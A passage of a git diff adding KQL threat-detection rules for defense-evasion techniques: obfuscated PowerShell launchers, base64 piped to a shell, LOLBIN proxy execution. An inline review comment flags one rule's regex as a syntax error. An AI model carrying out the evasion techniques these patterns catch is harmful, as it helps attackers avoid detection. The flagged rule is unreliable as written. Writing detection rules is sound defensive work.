index 00000000..2a946f9e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
@@ -0,0 +1,12 @@
+// Title: Indirect Inline Command Execution Via Bash.EXE
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
+This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql
new file mode 100644
index 00000000..5f43d093
--- /dev/null
+++ b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql
@@ -0,0 +1,10 @@
+// Title: InfDefaultInstall.exe .inf Execution
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
new file mode 100644
index 00000000..73f5e3d7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
@@ -0,0 +1,13 @@
+// Title: Insensitive Subfolder Search Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: low
+// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+// False Positives:
+// - Administrative or software activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i " or ProcessCommandLine contains " –i " or ProcessCommandLine contains " —i " or ProcessCommandLine contains " ―i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s " or ProcessCommandLine contains " –s " or ProcessCommandLine contains " —s " or ProcessCommandLine contains " ―s "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
new file mode 100644
index 00000000..0c3c6c61
--- /dev/null
+++ b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
@@ -0,0 +1,15 @@
+// Title: Install New Package Via Winget Local Manifest
+// Author: Sreeman, Florian Roth (Nextron Systems), frack113
+// Date: 2020-04-21
+// Level: medium
+// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
+The manifest option enables you to install an application by passing in a YAML file directly to the client.
+Winget can be used to download and install exe, msi or msix files later.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/install_root_certificate.kql b/KQL/rules/Defense Evasion/install_root_certificate.kql
new file mode 100644
index 00000000..e8e7381b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/install_root_certificate.kql
@@ -0,0 +1,12 @@
+// Title: Install Root Certificate
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-05
+// Level: low
+// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/update-ca-certificates" or FolderPath endswith "/update-ca-trust"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
new file mode 100644
index 00000000..b44c3773
--- /dev/null
+++ b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
@@ -0,0 +1,13 @@
+// Title: Internet Explorer DisableFirstRunCustomize Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - As this is controlled by group policy as well as user settings. Some false positives may occur.
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) and (not(((RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath contains "\\Temp\\" and InitiatingProcessFolderPath contains "\\.cr\\avira_")) or (RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe", "C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql
new file mode 100644
index 00000000..e80d4f9a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation CLIP+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql
new file mode 100644
index 00000000..d1ec21ab
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation COMPRESS OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql
new file mode 100644
index 00000000..df6c48fa
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Obfuscated IEX Invocation
+// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
+// Date: 2019-11-08
+// Level: high
+// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql
new file mode 100644
index 00000000..dfb4d941
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation STDIN+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of stdin to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql
new file mode 100644
index 00000000..43b33d4b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation VAR+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql
new file mode 100644
index 00000000..873f59b9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql
new file mode 100644
index 00000000..df58ebd7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Stdin
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects Obfuscated Powershell via Stdin in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql
new file mode 100644
index 00000000..53a7e851
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Use Clip
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-09
+// Level: high
+// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql
new file mode 100644
index 00000000..320b20d7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql
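Review bot: The regex literal ends in `.*""`, which closes the string at the first `"` and leaves a stray unbalanced `"` behind it, so this query is a syntax error and the rule will never run. The trailing quote the pattern is meant to match must be escaped inside the KQL string as `\\"`, i.e. `| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\\""`. The STDIN+ launcher hunk already shows the correct form (`.+\\""`), which suggests the converter only escapes a trailing quote in some code paths; a quick KQL parse of every generated file before commit would have caught this.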
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Use MSHTA
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-08
+// Level: high
+// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
new file mode 100644
index 00000000..fea3d976
--- /dev/null
+++ b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
@@ -0,0 +1,14 @@
+// Title: JScript Compiler Execution
+// Author: frack113
+// Date: 2022-05-02
+// Level: low
+// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
+Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use to compile JScript by developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql
new file mode 100644
index 00000000..cd771809
--- /dev/null
+++ b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql
@@ -0,0 +1,10 @@
+// Title: Kavremover Dropped Binary LOLBIN Usage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-01
+// Level: high
+// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\cleanapi.exe" or InitiatingProcessFolderPath endswith "\\kavremover.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql
new file mode 100644
index 00000000..4c4ad593
--- /dev/null
+++ b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql
@@ -0,0 +1,12 @@
+// Title: Kernel Memory Dump Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely in production environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m" or ProcessCommandLine contains " –m" or ProcessCommandLine contains " —m" or ProcessCommandLine contains " ―m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql
new file mode 100644
index 00000000..1be53fa6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Launch-VsDevShell.PS1 Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+// False Positives:
+// - Legitimate usage of the script by a developer
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql
new file mode 100644
index 00000000..0b5b55cf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Archive
+// Author: frack113, Florian Roth
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write an archive to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql
new file mode 100644
index 00000000..ae11a00a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Executable
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write executables to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql
new file mode 100644
index 00000000..33903996
--- /dev/null
+++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Script
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write scripts to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql
new file mode 100644
index 00000000..190919e4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql
@@ -0,0 +1,12 @@
+// Title: Linux Base64 Encoded Pipe to Shell
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-26
+// Level: medium
+// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "base64 " and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith " |sh" or ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql
new file mode 100644
index 00000000..fc0293f8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql
@@ -0,0 +1,12 @@
+// Title: Linux Base64 Encoded Shebang In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IyEvYmluL2Jhc2" or ProcessCommandLine contains "IyEvYmluL2Rhc2" or ProcessCommandLine contains "IyEvYmluL3pza" or ProcessCommandLine contains "IyEvYmluL2Zpc2" or ProcessCommandLine contains "IyEvYmluL3No"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql
new file mode 100644
index 00000000..52ea8311
--- /dev/null
+++ b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Linux Doas Conf File Creation
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the creation of doas.conf file in linux host platform.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "/etc/doas.conf"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql
new file mode 100644
index 00000000..5d86ef35
--- /dev/null
+++ b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux Doas Tool Execution
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: low
+// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "/doas"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_package_uninstall.kql b/KQL/rules/Defense Evasion/linux_package_uninstall.kql
new file mode 100644
index 00000000..cd19f090
--- /dev/null
+++ b/KQL/rules/Defense Evasion/linux_package_uninstall.kql
@@ -0,0 +1,12 @@
+// Title: Linux Package Uninstall
+// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: low
+// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "remove" or ProcessCommandLine contains "purge") and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--remove " or ProcessCommandLine contains " -r ") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains " -e " and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "erase" or ProcessCommandLine contains "remove") and FolderPath endswith "/yum")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql
new file mode 100644
index 00000000..0131181d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql
@@ -0,0 +1,12 @@
+// Title: Linux Shell Pipe to Shell
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate software that uses these patterns
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "sh -c " or ProcessCommandLine startswith "bash -c ") and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash" or ProcessCommandLine endswith " |sh"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation.kql b/KQL/rules/Defense Evasion/livekd_driver_creation.kql
new file mode 100644
index 00000000..bc4f6a1c
--- /dev/null
